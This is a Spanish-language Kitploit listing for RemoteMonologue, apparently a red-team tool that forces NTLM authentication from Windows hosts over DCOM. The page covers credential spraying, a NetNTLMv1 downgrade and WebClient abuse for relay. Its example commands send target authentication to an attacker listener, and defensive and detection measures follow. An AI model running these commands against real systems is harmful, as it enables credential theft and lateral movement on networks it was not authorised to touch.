Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
RemoteMonologue — Armando DCOM para coerciones de autenticación NTLM | Kitploit
Herramientas/GitHubGitHub/3lp4tr0n/remotemonologue
ReconocimientoAtaques de ContraseñasExplotaciónMovimiento LateralPost-ExplotaciónPruebas de PenetraciónAutenticaciónRed TeamingAtaque Adversario
GitHub3lp4tr0n/remotemonologue

RemoteMonologue

Armando DCOM para coerciones de autenticación NTLM

21542hace 9 mesesRevisado por Kitploit

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir
Ver Repositorio

RemoteMonologue

RemoteMonologue es una técnica de recolección de credenciales de Windows que permite comprometer usuarios de forma remota aprovechando la clave RunAs de usuario interactivo y forzando autenticaciones NTLM mediante DCOM.

Lea el artículo RemoteMonologue: Armando DCOM para Coerciones de Autenticación NTLM de X-Force Red para obtener información detallada.

Características

🔹 Coerción de Autenticación mediante DCOM (-dcom)

  • Apunta a cuatro objetos DCOM (ServerDataCollectorSet, FileSystemImage, MSTSWebProxy, UpdateSession) para provocar una autenticación NTLM contra un listener especificado (-auth-to).

🔹 Pulverización de Credenciales (-spray)

  • Valida credenciales en múltiples sistemas y, al mismo tiempo, captura credenciales de usuario.

🔹 Ataque de Degradación a NetNTLMv1 (-downgrade)

  • Obliga a los objetivos a usar NTLMv1, lo que facilita el descifrado (cracking) y la retransmisión (relaying) de credenciales.

🔹 Abuso del Servicio WebClient (-webclient)

  • Habilita el servicio WebClient para facilitar la coerción de autenticación basada en HTTP.

🔹 Enumeración de Usuarios (-query)

  • Identifica usuarios con una sesión activa en el sistema objetivo.

Nota: Se requieren privilegios de administrador local en el sistema objetivo.

Configuración

root@kitploit:~
pip install impacket

Ejemplos

A continuación se muestra un ejemplo de ejecución de RemoteMonologue con el ataque de degradación a NetNTLMv1 utilizando Responder como listener. De forma predeterminada, si no se especifica una opción DCOM, la herramienta usa el objeto DCOM ServerDataCollectorSet.

root@kitploit:~
RemoteMonologue.py domain/user:password@target -auth-to [listener IP] -downgrade

imagen

A continuación se muestra otro ejemplo, esta vez el ataque se ejecuta utilizando el objeto DCOM FileSystemImage y habilitando el servicio WebClient para obtener una autenticación HTTP, que luego se retransmite a LDAP mediante ntlmrelayx.

root@kitploit:~
RemoteMonologue.py domain/user:password@target -auth-to [listener NETBIOS@PORT] -webclient -dcom FileSystemImage

imagen

Consideraciones Defensivas

Para proteger contra estas técnicas y detectarlas, se pueden implementar varias medidas de prevención y detección.

Medidas preventivas:

  1. Habilitar la Firma LDAP y el Enlace de Canales: Configure el cumplimiento de la firma LDAP y el enlace de canales en los controladores de dominio para proteger el extremo LDAP de ataques de retransmisión. Nota: Esta configuración se aplicará de forma predeterminada a partir de Windows Server 2025.

  2. Actualizar a las Últimas Versiones de Windows: Actualice los servidores a Windows Server 2025 y las estaciones de trabajo a Windows 11 versión 24H2 para mitigar los ataques de degradación a NetNTLM, dado que NTLMv1 se ha eliminado en estas versiones.

  3. Aplicar la Firma SMB: Habilite y aplique la firma SMB en los servidores Windows para prevenir ataques de retransmisión SMB.

  4. Implementar Políticas de Contraseñas Seguras: Aplique requisitos de contraseñas seguras para que los ataques de descifrado de contraseñas sean más difíciles.

Oportunidades de detección:

  1. Monitorear el Acceso Remoto a Objetos DCOM: Realice un seguimiento del acceso a los objetos DCOM afectados y a sus Propiedades y Métodos específicos para identificar actividad inusual.

  2. Monitorear las Modificaciones del Registro: Supervise los cambios en las claves de registro RunAs y LmCompatibilityLevel.

  3. Rastrear la Actividad del Servicio WebClient: Esté atento a los casos en los que el servicio WebClient se habilita de forma remota, ya que esto se utiliza para facilitar las autenticaciones NTLM basadas en HTTP.

Descargar herramienta